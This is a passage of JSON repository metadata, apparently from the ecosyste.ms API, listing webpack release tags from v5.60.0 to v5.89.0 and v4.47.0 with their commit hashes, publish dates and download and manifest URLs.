webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyst